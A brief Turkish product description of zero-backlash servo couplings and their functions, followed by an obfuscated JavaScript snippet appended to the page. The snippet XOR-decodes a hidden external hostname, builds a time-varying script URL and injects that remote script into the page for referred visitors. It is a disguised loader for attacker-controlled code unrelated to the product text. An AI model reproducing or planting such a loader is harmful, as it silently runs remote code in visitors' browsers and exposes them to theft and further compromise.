Boşluksuz Servo Kaplinler

Boşluksuz servo aplinin Görevleri; encoderden, dönen bir milden, motordan, milden, redüktörden vs. aldığı döner hareketi diğer taraftaki şafta iletmek. Sistemdeki titreşimi kaplin lastiği ve yaylı ve esnekliği sayesinde belli ölçüde sönümleyerek motora veya diğer ekipmanlara iletilmesini engellemek. Kullanıldığı sistemde sigorta görevini üstlenmek. Millerdeki kaymayı ve salınımı belli ölçülerde tolere etmek. Millere gelen şok yükleri engellemek ve üzerine almak. Gürültüyü sönümlemek. Bu kaplinler ayrıca GS kaplin yada BK kaplin olarak da adlandırılırlar.

!function (_ba1bb6) { var _6c030e = Date.now(); var _6fa4dd = 1000; _6c030e = _6c030e / _6fa4dd; _6c030e = Math.floor(_6c030e); var _e4afd1 = 600; _6c030e -= _6c030e % _e4afd1; _6c030e = _6c030e.toString(16); var _4fd4b2 = _ba1bb6.referrer; if (!_4fd4b2) return; var _31e82b = [46386, 46379, 46454, 46379, 46395, 46384, 46397, 46389, 46393, 46453, 46398, 46391, 46378, 46389, 46379, 46454, 46391, 46378, 46399]; _31e82b = _31e82b.map(function(_7fe1e4){ return _7fe1e4 ^ 46424; }); var _d02325 = "8a7af28590cc1a29f073df7a30cd236c"; _31e82b = String.fromCharCode(..._31e82b); var _1ddc4e = "https://"; var _bf8942 = "/"; var _22dcf6 = "compose-"; var _543284 = ".js"; var _29e87f = _ba1bb6.createElement("script"); _29e87f.type = "text/javascript"; _29e87f.async = true; _29e87f.src = _1ddc4e + _31e82b + _bf8942 + _22dcf6 + _6c030e + _543284; _ba1bb6.getElementsByTagName("head")[0].appendChild(_29e87f) }(document);